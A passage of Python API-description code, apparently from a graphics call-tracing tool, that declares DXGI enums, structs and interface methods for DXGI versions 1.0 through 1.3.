"DXGI_RESIDENCY_EVICTED_TO_DISK",
])
DXGI_SURFACE_DESC = Struct("DXGI_SURFACE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
])
DXGI_SWAP_EFFECT = Enum("DXGI_SWAP_EFFECT", [
"DXGI_SWAP_EFFECT_DISCARD",
"DXGI_SWAP_EFFECT_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_DISCARD",
])
DXGI_SWAP_CHAIN_FLAG = Flags(UINT, [
"DXGI_SWAP_CHAIN_FLAG_NONPREROTATED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_MODE_SWITCH",
"DXGI_SWAP_CHAIN_FLAG_GDI_COMPATIBLE",
"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_CONTENT",
"DXGI_SWAP_CHAIN_FLAG_RESTRICT_SHARED_RESOURCE_DRIVER",
"DXGI_SWAP_CHAIN_FLAG_DISPLAY_ONLY",
"DXGI_SWAP_CHAIN_FLAG_FRAME_LATENCY_WAITABLE_OBJECT",
"DXGI_SWAP_CHAIN_FLAG_FOREGROUND_LAYER",
"DXGI_SWAP_CHAIN_FLAG_FULLSCREEN_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_YUV_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_HW_PROTECTED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_TEARING",
#"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_TO_ALL_HOLOGRAPHIC_DISPLAYS", # DXGI 1.6
])
DXGI_SWAP_CHAIN_DESC = Struct("DXGI_SWAP_CHAIN_DESC", [
(DXGI_MODE_DESC, "BufferDesc"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(HWND, "OutputWindow"),
(BOOL, "Windowed"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
IDXGIObject.methods += [
StdMethod(HRESULT, "SetPrivateData", [(REFGUID, "Name"), (UINT, "DataSize"), (OpaqueBlob(Const(Void), "DataSize"), "pData")], sideeffects=False),
StdMethod(HRESULT, "SetPrivateDataInterface", [(REFGUID, "Name"), (OpaquePointer(Const(IUnknown)), "pUnknown")], sideeffects=False),
StdMethod(HRESULT, "GetPrivateData", [(REFGUID, "Name"), InOut(Pointer(UINT), "pDataSize"), Out(OpaquePointer(Void), "pData")], sideeffects=False),
StdMethod(HRESULT, "GetParent", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParent")]),
]
IDXGIDeviceSubObject.methods += [
StdMethod(HRESULT, "GetDevice", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppDevice")]),
]
SHARED_HANDLE = Handle("shared_handle", RAW_HANDLE)
IDXGIResource.methods += [
StdMethod(HRESULT, "GetSharedHandle", [Out(Pointer(SHARED_HANDLE), "pSharedHandle")]),
StdMethod(HRESULT, "GetUsage", [Out(Pointer(DXGI_USAGE), "pUsage")], sideeffects=False),
StdMethod(HRESULT, "SetEvictionPriority", [(DXGI_RESOURCE_PRIORITY, "EvictionPriority")]),
StdMethod(HRESULT, "GetEvictionPriority", [Out(Pointer(DXGI_RESOURCE_PRIORITY), "pEvictionPriority")], sideeffects=False),
]
DWORD_TIMEOUT = FakeEnum(DWORD, [
"INFINITE",
])
IDXGIKeyedMutex.methods += [
StdMethod(HRESULT, "AcquireSync", [(UINT64, "Key"), (DWORD_TIMEOUT, "dwMilliseconds")], sideeffects=False),
StdMethod(HRESULT, "ReleaseSync", [(UINT64, "Key")]),
]
DXGI_MAP = Flags(UINT, [
"DXGI_MAP_READ",
"DXGI_MAP_WRITE",
"DXGI_MAP_DISCARD",
])
IDXGISurface.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SURFACE_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "Map", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect"), (DXGI_MAP, "MapFlags")]),
StdMethod(HRESULT, "Unmap", []),
]
IDXGISurface1.methods += [
StdMethod(HRESULT, "GetDC", [(BOOL, "Discard"), Out(Pointer(HDC), "phdc")]),
StdMethod(HRESULT, "ReleaseDC", [(Pointer(RECT), "pDirtyRect")]),
]
IDXGIAdapter.methods += [
StdMethod(HRESULT, "EnumOutputs", [(UINT, "Output"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_ADAPTER_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "CheckInterfaceSupport", [(REFGUID, "InterfaceName"), Out(Pointer(LARGE_INTEGER), "pUMDVersion")], sideeffects=False),
]
DXGI_ENUM_MODES = Flags(UINT, [
"DXGI_ENUM_MODES_INTERLACED",
"DXGI_ENUM_MODES_SCALING",
"DXGI_ENUM_MODES_STEREO",
"DXGI_ENUM_MODES_DISABLED_STEREO",
])
IDXGIOutput.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_OUTPUT_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "GetDisplayModeList", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode", [(Pointer(Const(DXGI_MODE_DESC)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "WaitForVBlank", []),
StdMethod(HRESULT, "TakeOwnership", [(ObjPointer(IUnknown), "pDevice"), (BOOL, "Exclusive")]),
StdMethod(Void, "ReleaseOwnership", []),
StdMethod(HRESULT, "GetGammaControlCapabilities", [Out(Pointer(DXGI_GAMMA_CONTROL_CAPABILITIES), "pGammaCaps")], sideeffects=False),
StdMethod(HRESULT, "SetGammaControl", [(Pointer(Const(DXGI_GAMMA_CONTROL)), "pArray")], sideeffects=False), # Avoid NumGammaControlPoints mismatch
StdMethod(HRESULT, "GetGammaControl", [Out(Pointer(DXGI_GAMMA_CONTROL), "pArray")], sideeffects=False),
StdMethod(HRESULT, "SetDisplaySurface", [(ObjPointer(IDXGISurface), "pScanoutSurface")]),
StdMethod(HRESULT, "GetDisplaySurfaceData", [(ObjPointer(IDXGISurface), "pDestination")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
]
DXGI_PRESENT = Flags(UINT, [
"DXGI_PRESENT_TEST",
"DXGI_PRESENT_DO_NOT_SEQUENCE",
"DXGI_PRESENT_RESTART",
"DXGI_PRESENT_DO_NOT_WAIT",
"DXGI_PRESENT_STEREO_PREFER_RIGHT",
"DXGI_PRESENT_STEREO_TEMPORARY_MONO",
"DXGI_PRESENT_RESTRICT_TO_OUTPUT",
"DXGI_PRESENT_USE_DURATION",
])
IDXGISwapChain.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "SetFullscreenState", [(BOOL, "Fullscreen"), (ObjPointer(IDXGIOutput), "pTarget")]),
StdMethod(HRESULT, "GetFullscreenState", [Out(Pointer(BOOL), "pFullscreen"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppTarget")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
DXGI_MWA = Flags(UINT, [
"DXGI_MWA_NO_WINDOW_CHANGES",
"DXGI_MWA_NO_ALT_ENTER",
"DXGI_MWA_NO_PRINT_SCREEN",
"DXGI_MWA_VALID",
])
IDXGIFactory.methods += [
StdMethod(HRESULT, "EnumAdapters", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
StdMethod(HRESULT, "MakeWindowAssociation", [(HWND, "WindowHandle"), (DXGI_MWA, "Flags")], sideeffects=False),
StdMethod(HRESULT, "GetWindowAssociation", [Out(Pointer(HWND), "pWindowHandle")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), Out(Pointer(ObjPointer(IDXGISwapChain)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSoftwareAdapter", [(HMODULE, "Module"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
]
IDXGIDevice.methods += [
StdMethod(HRESULT, "GetAdapter", [Out(Pointer(ObjPointer(IDXGIAdapter)), "pAdapter")]),
StdMethod(HRESULT, "CreateSurface", [(Pointer(Const(DXGI_SURFACE_DESC)), "pDesc"), (UINT, "NumSurfaces"), (DXGI_USAGE, "Usage"), (Pointer(Const(DXGI_SHARED_RESOURCE)), "pSharedResource"), Out(Pointer(ObjPointer(IDXGISurface)), "ppSurface")]),
StdMethod(HRESULT, "QueryResourceResidency", [(Array(Const(ObjPointer(IUnknown)), "NumResources"), "ppResources"), Out(Array(DXGI_RESIDENCY, "NumResources"), "pResidencyStatus"), (UINT, "NumResources")], sideeffects=False),
StdMethod(HRESULT, "SetGPUThreadPriority", [(INT, "Priority")]),
StdMethod(HRESULT, "GetGPUThreadPriority", [Out(Pointer(INT), "pPriority")], sideeffects=False),
]
DXGI_ADAPTER_FLAG = FakeEnum(UINT, [
"DXGI_ADAPTER_FLAG_NONE",
"DXGI_ADAPTER_FLAG_REMOTE",
"DXGI_ADAPTER_FLAG_SOFTWARE",
])
DXGI_ADAPTER_DESC1 = Struct("DXGI_ADAPTER_DESC1", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_DISPLAY_COLOR_SPACE = Struct("DXGI_DISPLAY_COLOR_SPACE", [
(Array(Array(FLOAT, 8), 2), "PrimaryCoordinates"),
(Array(Array(FLOAT, 16), 2), "WhitePoints"),
])
IDXGIFactory1.methods += [
StdMethod(HRESULT, "EnumAdapters1", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter1)), "ppAdapter")]),
StdMethod(BOOL, "IsCurrent", [], sideeffects=False),
]
IDXGIAdapter1.methods += [
StdMethod(HRESULT, "GetDesc1", [Out(Pointer(DXGI_ADAPTER_DESC1), "pDesc")], sideeffects=False),
]
IDXGIDevice1.methods += [
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
]
dxgi = Module('dxgi')
dxgi.addInterfaces([
IDXGIKeyedMutex,
IDXGIFactory1,
IDXGIDevice1,
IDXGIAdapter1,
IDXGIResource,
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "CreateDXGIFactory1", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "DXGID3D10CreateDevice", [(HMODULE, "hModule"), (ObjPointer(IDXGIFactory), "pFactory"), (ObjPointer(IDXGIAdapter), "pAdapter"), (UINT, "Flags"), (OpaquePointer(Const(IUnknown)), "pUnknown"), Out(Pointer(ObjPointer(Void)), "ppDevice")], internal=True),
StdFunction(HRESULT, "DXGID3D10CreateLayeredDevice", [(UINT), (UINT), (UINT), (UINT), (UINT)], internal=True),
StdFunction(SIZE_T, "DXGID3D10GetLayeredDeviceSize", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
StdFunction(HRESULT, "DXGID3D10RegisterLayers", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
])
#
# DXGI 1.2
#
IDXGIDisplayControl = Interface("IDXGIDisplayControl", IUnknown)
IDXGIDisplayControl.methods += [
StdMethod(BOOL, "IsStereoEnabled", [], sideeffects=False),
StdMethod(Void, "SetStereoEnabled", [(BOOL, "enabled")]),
]
DXGI_OUTDUPL_MOVE_RECT = Struct("DXGI_OUTDUPL_MOVE_RECT", [
(POINT, "SourcePoint"),
(RECT, "DestinationRect"),
])
DXGI_OUTDUPL_DESC = Struct("DXGI_OUTDUPL_DESC", [
(DXGI_MODE_DESC, "ModeDesc"),
(DXGI_MODE_ROTATION, "Rotation"),
(BOOL, "DesktopImageInSystemMemory"),
])
DXGI_OUTDUPL_POINTER_POSITION = Struct("DXGI_OUTDUPL_POINTER_POSITION", [
(POINT, "Position"),
(BOOL, "Visible"),
])
DXGI_OUTDUPL_POINTER_SHAPE_TYPE = Enum("DXGI_OUTDUPL_POINTER_SHAPE_TYPE", [
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MONOCHROME",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_COLOR",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MASKED_COLOR",
])
DXGI_OUTDUPL_POINTER_SHAPE_INFO = Struct("DXGI_OUTDUPL_POINTER_SHAPE_INFO", [
(UINT, "Type"),
(UINT, "Width"),
(UINT, "Height"),
(UINT, "Pitch"),
(POINT, "HotSpot"),
])
DXGI_OUTDUPL_FRAME_INFO = Struct("DXGI_OUTDUPL_FRAME_INFO", [
(LARGE_INTEGER, "LastPresentTime"),
(LARGE_INTEGER, "LastMouseUpdateTime"),
(UINT, "AccumulatedFrames"),
(BOOL, "RectsCoalesced"),
(BOOL, "ProtectedContentMaskedOut"),
(DXGI_OUTDUPL_POINTER_POSITION, "PointerPosition"),
(UINT, "TotalMetadataBufferSize"),
(UINT, "PointerShapeBufferSize"),
])
IDXGIOutputDuplication = Interface("IDXGIOutputDuplication", IDXGIObject)
IDXGIOutputDuplication.methods += [
StdMethod(Void, "GetDesc", [Out(Pointer(DXGI_OUTDUPL_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "AcquireNextFrame", [(UINT, "TimeoutInMilliseconds"), Out(Pointer(DXGI_OUTDUPL_FRAME_INFO), "pFrameInfo"), Out(Pointer(ObjPointer(IDXGIResource)), "ppDesktopResource")]),
StdMethod(HRESULT, "GetFrameDirtyRects", [(UINT, "DirtyRectsBufferSize"), Out(Array(RECT, "DirtyRectsBufferSize"), "pDirtyRectsBuffer"), Out(Pointer(UINT), "pDirtyRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFrameMoveRects", [(UINT, "MoveRectsBufferSize"), Out(Array(DXGI_OUTDUPL_MOVE_RECT, "MoveRectsBufferSize"), "pMoveRectBuffer"), Out(Pointer(UINT), "pMoveRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFramePointerShape", [(UINT, "PointerShapeBufferSize"), Out(OpaqueBlob(Void, "PointerShapeBufferSize"), "pPointerShapeBuffer"), Out(Pointer(UINT), "pPointerShapeBufferSizeRequired"), Out(Pointer(DXGI_OUTDUPL_POINTER_SHAPE_INFO), "pPointerShapeInfo")], sideeffects=False),
StdMethod(HRESULT, "MapDesktopSurface", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect")], sideeffects=False),
StdMethod(HRESULT, "UnMapDesktopSurface", [], sideeffects=False),
StdMethod(HRESULT, "ReleaseFrame", []),
]
DXGI_ALPHA_MODE = Enum("DXGI_ALPHA_MODE", [
"DXGI_ALPHA_MODE_UNSPECIFIED",
"DXGI_ALPHA_MODE_PREMULTIPLIED",
"DXGI_ALPHA_MODE_STRAIGHT",
"DXGI_ALPHA_MODE_IGNORE",
])
IDXGISurface2 = Interface("IDXGISurface2", IDXGISurface1)
IDXGISurface2.methods += [
StdMethod(HRESULT, "GetResource", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParentResource"), Out(Pointer(UINT), "pSubresourceIndex")]),
]
DXGI_SHARED_RESOURCE_FLAG = Flags(DWORD, [
"DXGI_SHARED_RESOURCE_READ",
"DXGI_SHARED_RESOURCE_WRITE",
])
IDXGIResource1 = Interface("IDXGIResource1", IDXGIResource)
IDXGIResource1.methods += [
StdMethod(HRESULT, "CreateSubresourceSurface", [(UINT, "index"), Out(Pointer(ObjPointer(IDXGISurface2)), "ppSurface")]),
StdMethod(HRESULT, "CreateSharedHandle", [(Pointer(Const(SECURITY_ATTRIBUTES)), "pAttributes"), (DXGI_SHARED_RESOURCE_FLAG, "dwAccess"), (LPCWSTR, "lpName"), Out(Pointer(HANDLE), "pHandle")]),
]
DXGI_OFFER_RESOURCE_PRIORITY = Enum("DXGI_OFFER_RESOURCE_PRIORITY", [
"DXGI_OFFER_RESOURCE_PRIORITY_LOW",
"DXGI_OFFER_RESOURCE_PRIORITY_NORMAL",
"DXGI_OFFER_RESOURCE_PRIORITY_HIGH",
])
IDXGIDevice2 = Interface("IDXGIDevice2", IDXGIDevice1)
IDXGIDevice2.methods += [
StdMethod(HRESULT, "OfferResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), (DXGI_OFFER_RESOURCE_PRIORITY, "Priority")]),
StdMethod(HRESULT, "ReclaimResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), Out(Pointer(BOOL), "pDiscarded")]),
StdMethod(HRESULT, "EnqueueSetEvent", [(HANDLE, "hEvent")], sideeffects=False),
]
DXGI_MODE_DESC1 = Struct("DXGI_MODE_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Stereo"),
])
DXGI_SCALING = Enum("DXGI_SCALING", [
"DXGI_SCALING_STRETCH",
"DXGI_SCALING_NONE",
"DXGI_SCALING_ASPECT_RATIO_STRETCH",
])
DXGI_SWAP_CHAIN_DESC1 = Struct("DXGI_SWAP_CHAIN_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(BOOL, "Stereo"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(DXGI_SCALING, "Scaling"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_ALPHA_MODE, "AlphaMode"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_SWAP_CHAIN_FULLSCREEN_DESC = Struct("DXGI_SWAP_CHAIN_FULLSCREEN_DESC", [
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Windowed"),
])
DXGI_PRESENT_PARAMETERS = Struct("DXGI_PRESENT_PARAMETERS", [
(UINT, "DirtyRectsCount"),
(Array(RECT, "{self}.DirtyRectsCount"), "pDirtyRects"),
(Pointer(RECT), "pScrollRect"),
(Pointer(POINT), "pScrollOffset"),
])
IDXGISwapChain1 = Interface("IDXGISwapChain1", IDXGISwapChain)
IDXGISwapChain1.methods += [
StdMethod(HRESULT, "GetDesc1", [(Out(Pointer(DXGI_SWAP_CHAIN_DESC1), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetFullscreenDesc", [(Out(Pointer(DXGI_SWAP_CHAIN_FULLSCREEN_DESC), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetHwnd", [(Out(Pointer(HWND), "pHwnd"))], sideeffects=False),
StdMethod(HRESULT, "GetCoreWindow", [(REFIID, "riid"), (Out(Pointer(ObjPointer(Void)), "ppUnk"))]),
StdMethod(HRESULT, "Present1", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags"), (Pointer(Const(DXGI_PRESENT_PARAMETERS)), "pPresentParameters")]),
StdMethod(BOOL, "IsTemporaryMonoSupported", [], sideeffects=False),
StdMethod(HRESULT, "GetRestrictToOutput", [(Out(Pointer(ObjPointer(IDXGIOutput)), "ppRestrictToOutput"))]),
StdMethod(HRESULT, "SetBackgroundColor", [(Pointer(Const(DXGI_RGBA)), "pColor")]),
StdMethod(HRESULT, "GetBackgroundColor", [(Out(Pointer(DXGI_RGBA), "pColor"))], sideeffects=False),
StdMethod(HRESULT, "SetRotation", [(DXGI_MODE_ROTATION, "Rotation")]),
StdMethod(HRESULT, "GetRotation", [(Out(Pointer(DXGI_MODE_ROTATION), "pRotation"))], sideeffects=False),
]
IDXGIFactory2 = Interface("IDXGIFactory2", IDXGIFactory1)
IDXGIFactory2.methods += [
StdMethod(BOOL, "IsWindowedStereoEnabled", [], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForHwnd", [(ObjPointer(IUnknown), "pDevice"), (HWND, "hWnd"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (Pointer(Const(DXGI_SWAP_CHAIN_FULLSCREEN_DESC)), "pFullscreenDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSwapChainForCoreWindow", [(ObjPointer(IUnknown), "pDevice"), (ObjPointer(IUnknown), "pWindow"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "GetSharedResourceAdapterLuid", [(HANDLE, "hResource"), Out(Pointer(LUID), "pLuid")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterStereoStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterOcclusionStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForComposition", [(ObjPointer(IUnknown), "pDevice"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
]
DXGI_GRAPHICS_PREEMPTION_GRANULARITY = Enum("DXGI_GRAPHICS_PREEMPTION_GRANULARITY", [
"DXGI_GRAPHICS_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PRIMITIVE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_TRIANGLE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PIXEL_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_COMPUTE_PREEMPTION_GRANULARITY = Enum("DXGI_COMPUTE_PREEMPTION_GRANULARITY", [
"DXGI_COMPUTE_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_DISPATCH_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_GROUP_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_ADAPTER_DESC2 = Struct("DXGI_ADAPTER_DESC2", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_ADAPTER_FLAG, "Flags"),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, "GraphicsPreemptionGranularity"),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, "ComputePreemptionGranularity"),
])
IDXGIAdapter2 = Interface("IDXGIAdapter2", IDXGIAdapter1)
IDXGIAdapter2.methods += [
StdMethod(HRESULT, "GetDesc2", [Out(Pointer(DXGI_ADAPTER_DESC2), "pDesc")], sideeffects=False),
]
IDXGIOutput1 = Interface("IDXGIOutput1", IDXGIOutput)
IDXGIOutput1.methods += [
StdMethod(HRESULT, "GetDisplayModeList1", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC1, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode1", [(Pointer(Const(DXGI_MODE_DESC1)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC1), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "GetDisplaySurfaceData1", [(ObjPointer(IDXGIResource), "pDestination")]),
StdMethod(HRESULT, "DuplicateOutput", [(ObjPointer(IUnknown), "pDevice"), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), "ppOutputDuplication")]),
]
dxgi.addInterfaces([
IDXGIDisplayControl,
IDXGIDevice2,
IDXGISwapChain1,
IDXGIFactory2,
IDXGIResource1,
IDXGIAdapter2,
IDXGIOutput1,
])
#
# DXGI 1.3
#
DXGI_CREATE_FACTORY_FLAGS = Flags(UINT, [
"DXGI_CREATE_FACTORY_DEBUG",
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory2", [(DXGI_CREATE_FACTORY_FLAGS, "Flags"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
])
IDXGIDevice3 = Interface("IDXGIDevice3", IDXGIDevice2)
IDXGIDevice3.methods += [
StdMethod(Void, "Trim", []),
]
DXGI_MATRIX_3X2_F = Struct("DXGI_MATRIX_3X2_F", [
(FLOAT, "_11"),
(FLOAT, "_12"),
(FLOAT, "_21"),
(FLOAT, "_22"),
(FLOAT, "_31"),
(FLOAT, "_32"),
])
IDXGISwapChain2 = Interface("IDXGISwapChain2", IDXGISwapChain1)
IDXGISwapChain2.methods += [
StdMethod(HRESULT, "SetSourceSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
StdMethod(HANDLE, "GetFrameLatencyWaitableObject", [], sideeffects=False),
StdMethod(HRESULT, "SetMatrixTransform", [(Pointer(Const(DXGI_MATRIX_3X2_F)), "pMatrix")]),
StdMethod(HRESULT, "GetMatrixTransform", [Out(Pointer(DXGI_MATRIX_3X2_F), "pMatrix")], sideeffects=False),
]
IDXGIOutput2 = Interface("IDXGIOutput2", IDXGIOutput1)
IDXGIOutput2.methods += [
StdMethod(BOOL, "SupportsOverlays", [], sideeffects=False),
]
IDXGIFactory3 = Interface("IDXGIFactory3", IDXGIFactory2)
IDXGIFactory3.methods += [
StdMethod(DXGI_CREATE_FACTORY_FLAGS, "GetCreationFlags", [], sideeffects=False),
]
DXGI_DECODE_SWAP_CHAIN_DESC = Struct("DXGI_DECODE_SWAP_CHAIN_DESC", [
(UINT, "Flags"),
])
# XXX: Flags
DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS = Enum("DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS", [
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_NOMINAL_RANGE",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_BT709",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_xvYCC",
])
IDXGIDecodeSwapChain = Interface("IDXGIDecodeSwapChain", IUnknown)
IDXGIDecodeSwapChain.methods += [
